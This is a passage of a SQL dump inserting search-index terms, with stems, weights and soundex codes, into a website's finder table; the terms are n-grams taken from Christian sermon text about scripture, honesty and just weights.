(284396, 'to christ you', 'to christ you', 0, 1, 1.4333, 'T2623', 1, '*'),
(284397, 'to die to', 'to die to', 0, 1, 1.3, 'T000', 1, '*'),
(284398, 'to following god', 'to following god', 0, 1, 1.5333, 'T14523', 1, '*'),
(284399, 'to god may', 'to god may', 0, 1, 1.3333, 'T235', 1, '*'),
(284400, 'to god whoever', 'to god whoever', 0, 1, 1.4667, 'T2316', 1, '*'),
(284401, 'to lead souls', 'to lead souls', 0, 1, 1.4333, 'T43242', 1, '*'),
(284402, 'to our church', 'to our church', 0, 1, 1.4333, 'T6262', 1, '*'),
(284403, 'to pass that', 'to pass that', 0, 1, 1.4, 'T123', 1, '*'),
(284404, 'to save him', 'to save him', 0, 1, 1.3667, 'T215', 1, '*'),
(284405, 'to see the', 'to see the', 0, 1, 1.3333, 'T230', 1, '*'),
(284406, 'to share that', 'to share that', 0, 1, 1.4333, 'T263', 1, '*'),
(284407, 'to sinner', 'to sinner', 0, 1, 1.3, 'T256', 1, '*'),
(284408, 'to sinner what', 'to sinner what', 0, 1, 1.4667, 'T2563', 1, '*'),
(284409, 'to tell the', 'to tell the', 0, 1, 1.3667, 'T430', 1, '*'),
(284410, 'to the extent', 'to the extent', 0, 1, 1.4333, 'T2353', 1, '*'),
(284411, 'to trace', 'to trace', 0, 1, 1.2667, 'T620', 2, '*'),
(284412, 'to trace his', 'to trace his', 0, 1, 1.4, 'T620', 1, '*'),
(284413, 'today we', 'todai we', 0, 1, 1.2667, 'T000', 1, '*'),
(284414, 'today we will', 'todai we will', 0, 1, 1.4333, 'T400', 1, '*'),
(284415, 'told amongst', 'told amongst', 0, 1, 1.4, 'T43523', 1, '*'),
(284416, 'told amongst other', 'told amongst other', 0, 1, 1.6, 'T435236', 1, '*'),
(284417, 'touch their', 'touch their', 0, 1, 1.3667, 'T236', 1, '*'),
(284418, 'touch their hearts', 'touch their hearts', 0, 1, 1.6, 'T23632', 1, '*'),
(284419, 'trace', 'trace', 0, 0, 0.3333, 'T620', 2, '*'),
(284420, 'trace his', 'trace his', 0, 1, 1.3, 'T620', 1, '*'),
(284421, 'trace his roots', 'trace his roots', 0, 1, 1.5, 'T62632', 1, '*'),
(284422, 'truly', 'truli', 0, 0, 0.3333, 'T640', 1, '*'),
(284423, 'truly said', 'truli said', 0, 1, 1.3333, 'T6423', 1, '*'),
(284424, 'truly said unto', 'truli said unto', 0, 1, 1.5, 'T642353', 1, '*'),
(284425, 'truths to', 'truth to', 0, 1, 1.3, 'T6323', 1, '*'),
(284426, 'truths to share', 'truth to share', 0, 1, 1.5, 'T632326', 1, '*'),
(284427, 'turning', 'turn', 0, 0, 0.4667, 'T652', 1, '*'),
(284428, 'turning away', 'turn away', 0, 1, 1.4, 'T652', 1, '*'),
(284429, 'turning away every', 'turn away every', 0, 1, 1.6, 'T65216', 1, '*'),
(284430, 'until the', 'until the', 0, 1, 1.3, 'U5343', 1, '*'),
(284431, 'until the times', 'until the times', 0, 1, 1.5, 'U534352', 1, '*'),
(284432, 'unto abraham', 'unto abraham', 0, 1, 1.4, 'U53165', 1, '*'),
(284433, 'unto abraham and', 'unto abraham and', 0, 1, 1.5333, 'U531653', 1, '*'),
(284434, 'unto me him', 'unto me him', 0, 1, 1.3667, 'U535', 1, '*'),
(284435, 'unto the fathers', 'unto the fathers', 0, 1, 1.5333, 'U531362', 1, '*'),
(284436, 'unto you', 'unto you', 0, 1, 1.2667, 'U530', 1, '*'),
(284437, 'unto you 21', 'unto you 21', 0, 1, 1.3667, 'U530', 1, '*'),
(284438, 'unto you 23', 'unto you 23', 0, 1, 1.3667, 'U530', 1, '*'),
(284439, 'unto you first', 'unto you first', 0, 1, 1.4667, 'U531623', 1, '*'),
(284440, 'unto you of', 'unto you of', 0, 1, 1.3667, 'U531', 1, '*'),
(284441, 'up his', 'up his', 0, 1, 1.2, 'U120', 1, '*'),
(284442, 'up his son', 'up his son', 0, 1, 1.3333, 'U125', 1, '*'),
(284443, 'up unto', 'up unto', 0, 1, 1.2333, 'U153', 1, '*'),
(284444, 'up unto you', 'up unto you', 0, 1, 1.3667, 'U153', 1, '*'),
(284445, 'verse 17', 'vers 17', 0, 1, 1.2667, 'V620', 1, '*'),
(284446, 'verse 17 don\'t', 'vers 17 don', 0, 1, 1.4667, 'V62353', 1, '*'),
(284447, 'verse 18 let', 'vers 18 let', 0, 1, 1.4, 'V6243', 1, '*'),
(284448, 'verse 19', 'vers 19', 0, 1, 1.2667, 'V620', 1, '*'),
(284449, 'verse 19 demand', 'vers 19 demand', 0, 1, 1.5, 'V62353', 1, '*'),
(284450, 'verse 20', 'vers 20', 0, 1, 1.2667, 'V620', 1, '*'),
(284451, 'verse 20 26', 'vers 20 26', 0, 1, 1.3667, 'V620', 1, '*'),
(284452, 'was preached', 'wa preached', 0, 1, 1.4, 'W21623', 1, '*'),
(284453, 'was preached unto', 'wa preached unto', 0, 1, 1.5667, 'W2162353', 1, '*'),
(284454, 'was the only', 'wa the only', 0, 1, 1.4, 'W2354', 1, '*'),
(284455, 'ways etc', 'wai etc', 0, 1, 1.2667, 'W232', 1, '*'),
(284456, 'ways etc he', 'wai etc he', 0, 1, 1.3667, 'W232', 1, '*'),
(284457, 'we will move', 'we will move', 0, 1, 1.4, 'W451', 1, '*'),
(284458, 'week sunday', 'week sunday', 0, 1, 1.3667, 'W253', 1, '*'),
(284459, 'week sunday my', 'week sunday my', 0, 1, 1.4667, 'W2535', 1, '*'),
(284460, 'what must', 'what must', 0, 1, 1.3, 'W3523', 1, '*'),
(284461, 'what must he', 'what must he', 0, 1, 1.4, 'W3523', 1, '*'),
(284462, 'what to tell', 'what to tell', 0, 1, 1.4, 'W340', 1, '*'),
(284463, 'whatsoever he shall', 'whatsoev he shall', 0, 1, 1.6333, 'W321624', 1, '*'),
(284464, 'when you have', 'when you have', 0, 1, 1.4333, 'W510', 1, '*'),
(284465, 'which before', 'which before', 0, 1, 1.4, 'W216', 1, '*'),
(284466, 'which before was', 'which before was', 0, 1, 1.5333, 'W2162', 1, '*'),
(284467, 'which god', 'which god', 0, 1, 1.3, 'W230', 1, '*'),
(284468, 'which god before', 'which god before', 0, 1, 1.5333, 'W2316', 1, '*'),
(284469, 'which god hath', 'which god hath', 0, 1, 1.4667, 'W230', 1, '*'),
(284470, 'which god made', 'which god made', 0, 1, 1.4667, 'W2353', 1, '*'),
(284471, 'which will', 'which will', 0, 1, 1.3333, 'W240', 1, '*'),
(284472, 'which will not', 'which will not', 0, 1, 1.4667, 'W2453', 1, '*'),
(284473, 'whoever', 'whoever', 0, 0, 0.4667, 'W160', 1, '*'),
(284474, 'whoever he', 'whoever he', 0, 1, 1.3333, 'W160', 1, '*'),
(284475, 'whoever he may', 'whoever he may', 0, 1, 1.4667, 'W165', 1, '*'),
(284476, 'whom the', 'whom the', 0, 1, 1.2667, 'W530', 1, '*'),
(284477, 'whom the heaven', 'whom the heaven', 0, 1, 1.5, 'W5315', 1, '*'),
(284478, 'will go etc', 'will go etc', 0, 1, 1.3667, 'W4232', 1, '*'),
(284479, 'will move on', 'will move on', 0, 1, 1.4, 'W4515', 1, '*'),
(284480, 'will not hear', 'will not hear', 0, 1, 1.4333, 'W4536', 1, '*'),
(284481, 'will not save', 'will not save', 0, 1, 1.4333, 'W45321', 1, '*'),
(284482, 'will touch', 'will touch', 0, 1, 1.3333, 'W432', 2, '*'),
(284483, 'will touch their', 'will touch their', 0, 1, 1.5333, 'W43236', 1, '*'),
(284484, 'with our', 'with our', 0, 1, 1.2667, 'W360', 1, '*'),
(284485, 'with our fathers', 'with our fathers', 0, 1, 1.5333, 'W361362', 1, '*'),
(284486, 'womanizing', 'woman', 0, 0, 0.6667, 'W5252', 1, '*'),
(284487, 'womanizing or', 'woman or', 0, 1, 1.4333, 'W52526', 1, '*'),
(284488, 'womanizing or cheating', 'woman or cheating', 0, 1, 1.7333, 'W525262352', 1, '*'),
(284489, 'world began', 'world began', 0, 1, 1.3667, 'W643125', 1, '*'),
(284490, 'world began 22', 'world began 22', 0, 1, 1.4667, 'W643125', 1, '*'),
(284491, 'wot', 'wot', 0, 0, 0.2, 'W300', 1, '*'),
(284492, 'wot that', 'wot that', 0, 1, 1.2667, 'W300', 1, '*'),
(284493, 'wot that through', 'wot that through', 0, 1, 1.5333, 'W362', 1, '*'),
(284494, 'would still', 'would still', 0, 1, 1.3667, 'W43234', 1, '*'),
(284495, 'would still have', 'would still have', 0, 1, 1.5333, 'W432341', 1, '*'),
(284496, 'ye are', 'ye are', 0, 1, 1.2, 'Y600', 2, '*'),
(284497, 'ye are the', 'ye are the', 0, 1, 1.3333, 'Y630', 1, '*'),
(284498, 'ye did', 'ye did', 0, 1, 1.2, 'Y300', 1, '*'),
(284499, 'ye did it', 'ye did it', 0, 1, 1.3, 'Y300', 1, '*'),
(284500, 'ye hear', 'ye hear', 0, 1, 1.2333, 'Y600', 1, '*'),
(284501, 'ye hear in', 'ye hear in', 0, 1, 1.3333, 'Y650', 1, '*'),
(284502, 'yea and all', 'yea and all', 0, 1, 1.3667, 'Y534', 1, '*'),
(284503, 'you 21', 'you 21', 0, 1, 1.2, 'Y000', 1, '*'),
(284504, 'you 21 whom', 'you 21 whom', 0, 1, 1.3667, 'Y500', 1, '*'),
(284505, 'you 23', 'you 23', 0, 1, 1.2, 'Y000', 1, '*'),
(284506, 'you 23 and', 'you 23 and', 0, 1, 1.3333, 'Y530', 1, '*'),
(284507, 'you are his', 'you are his', 0, 1, 1.3667, 'Y620', 1, '*'),
(284508, 'you first', 'you first', 0, 1, 1.3, 'Y1623', 1, '*'),
(284509, 'you first god', 'you first god', 0, 1, 1.4333, 'Y162323', 1, '*'),
(284510, 'you from his', 'you from his', 0, 1, 1.4, 'Y1652', 1, '*'),
(284511, 'you have the', 'you have the', 0, 1, 1.4, 'Y130', 1, '*'),
(284512, 'you in turning', 'you in turning', 0, 1, 1.4667, 'Y53652', 1, '*'),
(284513, 'you lead', 'you lead', 0, 1, 1.2667, 'Y430', 1, '*'),
(284514, 'you lead men', 'you lead men', 0, 1, 1.4, 'Y435', 1, '*'),
(284515, 'your brethren', 'your brethren', 0, 1, 1.4333, 'Y616365', 1, '*'),
(284516, 'your brethren like', 'your brethren like', 0, 1, 1.6, 'Y61636542', 1, '*'),
(284517, 'your god', 'your god', 0, 1, 1.2667, 'Y623', 1, '*'),
(284518, 'your god raise', 'your god raise', 0, 1, 1.4667, 'Y62362', 1, '*'),
(284519, 'your problem', 'your problem', 0, 1, 1.4, 'Y616145', 1, '*'),
(284520, 'your problem will', 'your problem will', 0, 1, 1.5667, 'Y6161454', 1, '*'),
(284521, 'your rulers', 'your rulers', 0, 1, 1.3667, 'Y6462', 1, '*'),
(284522, 'your rulers 18', 'your rulers 18', 0, 1, 1.4667, 'Y6462', 1, '*'),
(284736, '11 deu.25', '11 deu.25', 0, 1, 1.3, 'D000', 1, '*'),
(284737, '11 deu.25 13-16', '11 deu.25 13-16', 0, 1, 1.5, 'D000', 1, '*'),
(284738, '11 prov', '11 prov', 0, 1, 1.2333, 'P610', 1, '*'),
(284739, '11 prov 16', '11 prov 16', 0, 1, 1.3333, 'P610', 1, '*'),
(284740, '13-16 introduction', '13-16 introduction', 0, 1, 1.6, 'I5363235', 1, '*'),
(284741, '13-16 introduction weights', '13-16 introduction weights', 0, 1, 1.8667, 'I5363235232', 1, '*'),
(284742, '16 11', '16 11', 0, 1, 1.1667, '', 1, '*'),
(284743, '16 11 deu.25', '16 11 deu.25', 0, 1, 1.4, 'D000', 1, '*'),
(284744, '31 importance', '31 importance', 0, 1, 1.4333, 'I516352', 1, '*'),
(284745, '31 importance and', '31 importance and', 0, 1, 1.5667, 'I51635253', 1, '*'),
(284746, '6 11', '6 11', 0, 1, 1.1333, '', 1, '*'),
(284747, '6 11 prov', '6 11 prov', 0, 1, 1.3, 'P610', 1, '*'),
(284748, 'a course', 'a course', 0, 1, 1.2667, 'A262', 1, '*'),
(284749, 'a course exam', 'a course exam', 0, 1, 1.4333, 'A2625', 1, '*'),
(284750, 'a man especially', 'a man especially', 0, 1, 1.5333, 'A52124', 1, '*'),
(284751, 'a neutral', 'a neutral', 0, 1, 1.3, 'A5364', 1, '*'),
(284752, 'a neutral judge', 'a neutral judge', 0, 1, 1.5, 'A5364232', 1, '*'),
(284753, 'a thing such', 'a thing such', 0, 1, 1.4, 'A352', 1, '*'),
(284754, 'a weight', 'a weight', 0, 1, 1.2667, 'A230', 1, '*'),
(284755, 'a weight is', 'a weight is', 0, 1, 1.3667, 'A232', 1, '*'),
(284756, 'accurate', 'accur', 0, 0, 0.5333, 'A263', 1, '*'),
(284757, 'accurate measure', 'accur measure', 0, 1, 1.5333, 'A263526', 1, '*'),
(284758, 'accurate measure or', 'accur measure or', 0, 1, 1.6333, 'A263526', 1, '*'),
(284759, 'add or', 'add or', 0, 1, 1.2, 'A360', 1, '*'),
(284760, 'add or remove', 'add or remove', 0, 1, 1.4333, 'A3651', 1, '*'),
(284761, 'advancement', 'advanc', 0, 0, 0.7333, 'A315253', 1, '*'),
(284762, 'advancement in', 'advanc in', 0, 1, 1.4667, 'A3152535', 1, '*'),
(284763, 'advancement in physical', 'advanc in physical', 0, 1, 1.7667, 'A3152535124', 1, '*'),
(284764, 'after a', 'after a', 0, 1, 1.2333, 'A136', 1, '*'),
(284765, 'after a course', 'after a course', 0, 1, 1.4667, 'A136262', 1, '*'),
(284766, 'all these may', 'all these may', 0, 1, 1.4333, 'A4325', 1, '*'),
(284767, 'and as he', 'and as he', 0, 1, 1.3, 'A532', 1, '*'),
(284768, 'and collect', 'and collect', 0, 1, 1.3667, 'A532423', 1, '*'),
(284769, 'and collect more', 'and collect more', 0, 1, 1.5333, 'A53242356', 1, '*'),
(284770, 'and power', 'and power', 0, 1, 1.3, 'A5316', 1, '*'),
(284771, 'and power can\'t', 'and power can', 0, 1, 1.5, 'A5316253', 1, '*'),
(284772, 'and significance', 'and significance', 0, 1, 1.5333, 'A53251252', 1, '*'),
(284773, 'and significance of', 'and significance of', 0, 1, 1.6333, 'A532512521', 1, '*'),
(284774, 'and take more', 'and take more', 0, 1, 1.4333, 'A53256', 1, '*'),
(284775, 'and value a', 'and value a', 0, 1, 1.3667, 'A5314', 1, '*'),
(284776, 'are shifting', 'ar shifting', 0, 1, 1.4, 'A621352', 1, '*'),
(284777, 'are shifting from', 'ar shifting from', 0, 1, 1.5667, 'A621352165', 1, '*'),
(284778, 'as he deals', 'as he deals', 0, 1, 1.3667, 'A2342', 1, '*'),
(284779, 'as scales', 'as scales', 0, 1, 1.3, 'A242', 1, '*'),
(284780, 'as scales tape', 'as scales tape', 0, 1, 1.4667, 'A24231', 1, '*'),
(284781, 'as we go', 'as we go', 0, 1, 1.2667, 'A200', 1, '*'),
(284782, 'be implied', 'be implied', 0, 1, 1.3333, 'B5143', 1, '*'),
(284783, 'be implied just', 'be implied just', 0, 1, 1.5, 'B514323', 1, '*'),
(284784, 'be literal', 'be literal', 0, 1, 1.3333, 'B4364', 1, '*'),
(284785, 'be literal or', 'be literal or', 0, 1, 1.4333, 'B43646', 1, '*'),
(284786, 'be richly', 'be richly', 0, 1, 1.3, 'B624', 1, '*'),
(284787, 'be richly blessed', 'be richly blessed', 0, 1, 1.5667, 'B6241423', 1, '*'),
(284788, 'bear false', 'bear false', 0, 1, 1.3333, 'B6142', 1, '*'),
(284789, 'bear false witness', 'bear false witness', 0, 1, 1.6, 'B6142352', 1, '*'),
(284790, 'being right', 'be right', 0, 1, 1.3667, 'B52623', 1, '*'),
(284791, 'being right telling', 'be right telling', 0, 1, 1.6333, 'B52623452', 1, '*'),
(284792, 'being straight forward', 'be straight forward', 0, 1, 1.7333, 'B523623163', 1, '*'),
(284793, 'believer and as', 'believ and as', 0, 1, 1.5, 'B416532', 1, '*'),
(284794, 'bent', 'bent', 0, 0, 0.2667, 'B530', 1, '*'),
(284795, 'bent the', 'bent the', 0, 1, 1.2667, 'B530', 1, '*'),
(284796, 'bent the money', 'bent the money', 0, 1, 1.4667, 'B535', 1, '*'),
(284797, 'blessed as', 'bless as', 0, 1, 1.3333, 'B4232', 1, '*'),
(284798, 'blessed as we', 'bless as we', 0, 1, 1.4333, 'B4232', 1, '*'),
(284799, 'bowls', 'bowl', 0, 0, 0.3333, 'B420', 1, '*'),
(284800, 'bowls certificate', 'bowl certificate', 0, 1, 1.5667, 'B4263123', 1, '*'),
(284801, 'bowls certificate after', 'bowl certificate after', 0, 1, 1.7667, 'B4263123136', 1, '*'),
(284802, 'bring more money', 'bring more money', 0, 1, 1.5333, 'B652565', 1, '*'),
(284803, 'but does', 'but does', 0, 1, 1.2667, 'B320', 1, '*'),
(284804, 'but does great', 'but does great', 0, 1, 1.4667, 'B3263', 1, '*'),
(284805, 'can\'t reach', 'can reach', 0, 1, 1.3667, 'C5362', 1, '*'),
(284806, 'can\'t reach you', 'can reach you', 0, 1, 1.5, 'C5362', 1, '*'),
(284807, 'certificate', 'certif', 0, 0, 0.7333, 'C63123', 1, '*'),
(284808, 'certificate after', 'certif after', 0, 1, 1.5667, 'C63123136', 1, '*'),
(284809, 'certificate after a', 'certif after a', 0, 1, 1.6333, 'C63123136', 1, '*'),
(284810, 'change figures', 'chang figures', 0, 1, 1.4667, 'C521262', 1, '*'),
(284811, 'change figures bear', 'chang figures bear', 0, 1, 1.6333, 'C52126216', 1, '*'),
(284812, 'cheat others', 'cheat others', 0, 1, 1.4, 'C362', 1, '*'),
(284813, 'cheat others tell', 'cheat others tell', 0, 1, 1.5667, 'C36234', 1, '*'),
(284814, 'class', 'class', 0, 0, 0.3333, 'C420', 1, '*'),
(284815, 'class to', 'class to', 0, 1, 1.2667, 'C423', 1, '*'),
(284816, 'class to the', 'class to the', 0, 1, 1.4, 'C423', 1, '*'),
(284817, 'collect', 'collect', 0, 0, 0.4667, 'C423', 1, '*'),
(284818, 'collect more', 'collect more', 0, 1, 1.4, 'C42356', 1, '*'),
(284819, 'collect more money', 'collect more money', 0, 1, 1.6, 'C423565', 1, '*'),
(284820, 'conscience of', 'conscienc of', 0, 1, 1.4333, 'C52521', 1, '*'),
(284821, 'conscience of a', 'conscienc of a', 0, 1, 1.5, 'C52521', 1, '*'),
(284822, 'containers', 'contain', 0, 0, 0.6667, 'C53562', 1, '*'),
(284823, 'containers kegs', 'contain kegs', 0, 1, 1.5, 'C53562', 1, '*'),
(284824, 'containers kegs bowls', 'contain kegs bowls', 0, 1, 1.7, 'C53562142', 1, '*'),
(284825, 'correct values', 'correct values', 0, 1, 1.4667, 'C623142', 1, '*'),
(284826, 'correct values many', 'correct values many', 0, 1, 1.6333, 'C6231425', 1, '*'),
(284827, 'could be implied', 'could be implied', 0, 1, 1.5333, 'C4315143', 1, '*'),
(284828, 'could be literal', 'could be literal', 0, 1, 1.5333, 'C4314364', 1, '*'),
(284829, 'course exam', 'cours exam', 0, 1, 1.3667, 'C625', 1, '*'),
(284830, 'course exam results', 'cours exam results', 0, 1, 1.6333, 'C62562432', 1, '*'),
(284831, 'damage', 'damag', 0, 0, 0.4, 'D520', 1, '*'),
(284832, 'damage to', 'damag to', 0, 1, 1.3, 'D523', 1, '*'),
(284833, 'damage to the', 'damag to the', 0, 1, 1.4333, 'D523', 1, '*'),
(284834, 'deals', 'deal', 0, 0, 0.3333, 'D420', 1, '*'),
(284835, 'deals with', 'deal with', 0, 1, 1.3333, 'D423', 1, '*'),
(284836, 'deals with the', 'deal with the', 0, 1, 1.4667, 'D423', 1, '*'),
(284837, 'deu.25', 'deu.25', 0, 0, 0.4, 'D000', 1, '*'),
(284838, 'deu.25 13-16', 'deu.25 13-16', 0, 1, 1.4, 'D000', 1, '*'),
(284839, 'deu.25 13-16 introduction', 'deu.25 13-16 introduction', 0, 1, 1.8333, 'D5363235', 1, '*'),
(284840, 'does great', 'doe great', 0, 1, 1.3333, 'D263', 1, '*'),
(284841, 'does great damage', 'doe great damage', 0, 1, 1.5667, 'D26352', 1, '*'),
(284842, 'enables', 'enabl', 0, 0, 0.4667, 'E5142', 1, '*'),
(284843, 'enables one', 'enabl one', 0, 1, 1.3667, 'E51425', 1, '*'),
(284844, 'enables one to', 'enabl one to', 0, 1, 1.4667, 'E514253', 1, '*'),
(284845, 'especially the', 'especi the', 0, 1, 1.4667, 'E21243', 1, '*'),
(284846, 'especially the believer', 'especi the believer', 0, 1, 1.7667, 'E212431416', 1, '*'),
(284847, 'essential', 'essenti', 0, 0, 0.6, 'E2534', 1, '*'),
(284848, 'essential may', 'essenti may', 0, 1, 1.4333, 'E25345', 1, '*'),
(284849, 'essential may you', 'essenti may you', 0, 1, 1.5667, 'E25345', 1, '*'),
(284850, 'etc this', 'etc this', 0, 1, 1.2667, 'E3232', 1, '*'),
(284851, 'etc this enables', 'etc this enables', 0, 1, 1.5333, 'E32325142', 1, '*'),
(284852, 'exam', 'exam', 0, 0, 0.2667, 'E250', 1, '*'),
(284853, 'exam results', 'exam results', 0, 1, 1.4, 'E2562432', 1, '*'),
(284854, 'exam results from', 'exam results from', 0, 1, 1.5667, 'E2562432165', 1, '*'),
(284855, 'false witness', 'fals witness', 0, 1, 1.4333, 'F42352', 1, '*'),
(284856, 'false witness all', 'fals witness all', 0, 1, 1.5667, 'F423524', 1, '*'),
(284857, 'figures', 'figur', 0, 0, 0.4667, 'F262', 1, '*'),
(284858, 'figures bear', 'figur bear', 0, 1, 1.4, 'F26216', 1, '*'),
(284859, 'figures bear false', 'figur bear false', 0, 1, 1.6, 'F26216142', 1, '*'),
(284860, 'flesh the', 'flesh the', 0, 1, 1.3, 'F423', 1, '*'),
(284861, 'flesh the more', 'flesh the more', 0, 1, 1.4667, 'F42356', 1, '*'),
(284862, 'for more', 'for more', 0, 1, 1.2667, 'F656', 1, '*'),
(284863, 'for more or', 'for more or', 0, 1, 1.3667, 'F656', 1, '*'),
(284864, 'forward right', 'forward right', 0, 1, 1.4333, 'F63623', 1, '*'),
(284865, 'forward right standard', 'forward right standard', 0, 1, 1.7333, 'F63623235363', 1, '*'),
(284866, 'from god\'s presence', 'from god presence', 0, 1, 1.6333, 'F6523216252', 1, '*'),
(284867, 'from one', 'from one', 0, 1, 1.2667, 'F650', 2, '*'),
(284868, 'from one class', 'from one class', 0, 1, 1.4667, 'F65242', 1, '*'),
(284869, 'from right', 'from right', 0, 1, 1.3333, 'F65623', 1, '*'),
(284870, 'from right thing', 'from right thing', 0, 1, 1.5333, 'F6562352', 1, '*'),
(284871, 'gain change', 'gain change', 0, 1, 1.3667, 'G5252', 1, '*'),
(284872, 'gain change figures', 'gain change figures', 0, 1, 1.6333, 'G52521262', 1, '*'),
(284873, 'get the accurate', 'get the accurate', 0, 1, 1.5333, 'G3263', 1, '*'),
(284874, 'go into this', 'go into this', 0, 1, 1.4, 'G532', 1, '*'),
(284875, 'god\'s presence to', 'god presence to', 0, 1, 1.5667, 'G32162523', 1, '*'),
(284876, 'great damage', 'great damage', 0, 1, 1.4, 'G6352', 1, '*'),
(284877, 'great damage to', 'great damage to', 0, 1, 1.5, 'G63523', 1, '*'),
(284878, 'having integrity', 'have integrity', 0, 1, 1.5333, 'H15253263', 1, '*'),
(284879, 'having integrity innocence', 'have integrity innocence', 0, 1, 1.8667, 'H152532635252', 1, '*'),
(284880, 'he deals', 'he deals', 0, 1, 1.2667, 'H342', 1, '*'),
(284881, 'he deals with', 'he deals with', 0, 1, 1.4333, 'H3423', 1, '*'),
(284882, 'he inside', 'he inside', 0, 1, 1.3, 'H523', 1, '*'),
(284883, 'he inside straight', 'he inside straight', 0, 1, 1.6, 'H52323623', 1, '*'),
(284884, 'highly essential', 'highli essential', 0, 1, 1.5333, 'H242534', 1, '*'),
(284885, 'highly essential may', 'highli essential may', 0, 1, 1.6667, 'H2425345', 1, '*'),
(284886, 'his life voice', 'hi life voice', 0, 1, 1.4667, 'H2412', 1, '*'),
(284887, 'illegal', 'illeg', 0, 0, 0.4667, 'I424', 1, '*'),
(284888, 'illegal gain', 'illeg gain', 0, 1, 1.4, 'I42425', 1, '*'),
(284889, 'illegal gain change', 'illeg gain change', 0, 1, 1.6333, 'I42425252', 1, '*'),
(284890, 'implied', 'impli', 0, 0, 0.4667, 'I5143', 1, '*'),
(284891, 'implied just', 'impli just', 0, 1, 1.4, 'I514323', 1, '*'),
(284892, 'implied just weight', 'impli just weight', 0, 1, 1.6333, 'I51432323', 1, '*'),
(284893, 'implied literal', 'impli literal', 0, 1, 1.5, 'I51434364', 1, '*'),
(284894, 'implied literal in', 'impli literal in', 0, 1, 1.6, 'I514343645', 1, '*'),
(284895, 'importance', 'import', 0, 0, 0.6667, 'I516352', 1, '*'),
(284896, 'importance and', 'import and', 0, 1, 1.4667, 'I51635253', 1, '*'),
(284897, 'importance and significance', 'import and significance', 0, 1, 1.9, 'I51635253251252', 1, '*'),
(284898, 'in physical life', 'in physical life', 0, 1, 1.5333, 'I51241', 1, '*'),
(284899, 'in terms', 'in terms', 0, 1, 1.2667, 'I53652', 1, '*'),
(284900, 'in terms of', 'in terms of', 0, 1, 1.3667, 'I536521', 1, '*'),
(284901, 'innocence', 'innoc', 0, 0, 0.6, 'I5252', 1, '*'),
(284902, 'innocence being', 'innoc being', 0, 1, 1.5, 'I5252152', 1, '*'),
(284903, 'innocence being straight', 'innoc being straight', 0, 1, 1.8, 'I52521523623', 1, '*'),
(284904, 'inside straight', 'insid straight', 0, 1, 1.5, 'I52323623', 1, '*'),
(284905, 'inside straight or', 'insid straight or', 0, 1, 1.6, 'I523236236', 1, '*'),
(284906, 'integrity innocence', 'integr innocence', 0, 1, 1.6333, 'I532635252', 1, '*'),
(284907, 'integrity innocence being', 'integr innocence being', 0, 1, 1.8333, 'I532635252152', 1, '*'),
(284908, 'into this', 'into this', 0, 1, 1.3, 'I532', 1, '*'),
(284909, 'into this series', 'into this series', 0, 1, 1.5333, 'I53262', 1, '*'),
(284910, 'introduction weights', 'introduct weights', 0, 1, 1.6667, 'I5363235232', 1, '*'),
(284911, 'introduction weights could', 'introduct weights could', 0, 1, 1.8667, 'I536323523243', 1, '*'),
(284912, 'is a neutral', 'is a neutral', 0, 1, 1.4, 'I25364', 1, '*'),
(284913, 'is he', 'is he', 0, 1, 1.1667, 'I200', 1, '*'),
(284914, 'is he inside', 'is he inside', 0, 1, 1.4, 'I2523', 1, '*'),
(284915, 'is highly', 'is highly', 0, 1, 1.3, 'I240', 1, '*'),
(284916, 'is highly essential', 'is highly essential', 0, 1, 1.6333, 'I242534', 1, '*'),
(284917, 'it simple', 'it simple', 0, 1, 1.3, 'I32514', 1, '*'),
(284918, 'it simple spells', 'it simple spells', 0, 1, 1.5333, 'I325142142', 1, '*'),
(284919, 'item 31', 'item 31', 0, 1, 1.2333, 'I350', 1, '*'),
(284920, 'item 31 importance', 'item 31 importance', 0, 1, 1.6, 'I3516352', 1, '*'),
(284921, 'judge it', 'judg it', 0, 1, 1.2667, 'J323', 1, '*'),
(284922, 'judge it simple', 'judg it simple', 0, 1, 1.5, 'J3232514', 1, '*'),
(284923, 'just weight is', 'just weight is', 0, 1, 1.4667, 'J3232', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(284924, 'just weight may', 'just weight may', 0, 1, 1.5, 'J3235', 1, '*'),
(284925, 'just weight so', 'just weight so', 0, 1, 1.4667, 'J3232', 1, '*'),
(284926, 'k2 item 31', 'k2 item 31', 0, 1, 1.3333, 'K350', 1, '*'),
(284927, 'kegs', 'keg', 0, 0, 0.2667, 'K000', 1, '*'),
(284928, 'kegs bowls', 'keg bowls', 0, 1, 1.3333, 'K142', 1, '*'),
(284929, 'kegs bowls certificate', 'keg bowls certificate', 0, 1, 1.7333, 'K14263123', 1, '*'),
(284930, 'know the level', 'know the level', 0, 1, 1.4667, 'K53414', 1, '*'),
(284931, 'less and', 'less and', 0, 1, 1.2667, 'L253', 1, '*'),
(284932, 'less and collect', 'less and collect', 0, 1, 1.5333, 'L2532423', 1, '*'),
(284933, 'less and take', 'less and take', 0, 1, 1.4333, 'L2532', 1, '*'),
(284934, 'level the', 'level the', 0, 1, 1.3, 'L143', 1, '*'),
(284935, 'level the true', 'level the true', 0, 1, 1.4667, 'L1436', 1, '*'),
(284936, 'lies', 'li', 0, 0, 0.2667, 'L200', 1, '*'),
(284937, 'lies pretend', 'li pretend', 0, 1, 1.4, 'L216353', 1, '*'),
(284938, 'lies pretend add', 'li pretend add', 0, 1, 1.5333, 'L216353', 1, '*'),
(284939, 'life but', 'life but', 0, 1, 1.2667, 'L130', 1, '*'),
(284940, 'life but does', 'life but does', 0, 1, 1.4333, 'L132', 1, '*'),
(284941, 'life voice', 'life voice', 0, 1, 1.3333, 'L120', 1, '*'),
(284942, 'life voice and', 'life voice and', 0, 1, 1.4667, 'L1253', 1, '*'),
(284943, 'literal', 'liter', 0, 0, 0.4667, 'L364', 1, '*'),
(284944, 'literal in', 'liter in', 0, 1, 1.3333, 'L3645', 1, '*'),
(284945, 'literal in terms', 'liter in terms', 0, 1, 1.5333, 'L36453652', 1, '*'),
(284946, 'literal or', 'liter or', 0, 1, 1.3333, 'L3646', 1, '*'),
(284947, 'literal or implied', 'liter or implied', 0, 1, 1.6, 'L36465143', 1, '*'),
(284948, 'man especially', 'man especially', 0, 1, 1.4667, 'M2124', 1, '*'),
(284949, 'man especially the', 'man especially the', 0, 1, 1.6, 'M21243', 1, '*'),
(284950, 'many people want', 'mani people want', 0, 1, 1.5333, 'M1453', 1, '*'),
(284951, 'may bring', 'mai bring', 0, 1, 1.3, 'M1652', 1, '*'),
(284952, 'may bring more', 'mai bring more', 0, 1, 1.4667, 'M165256', 1, '*'),
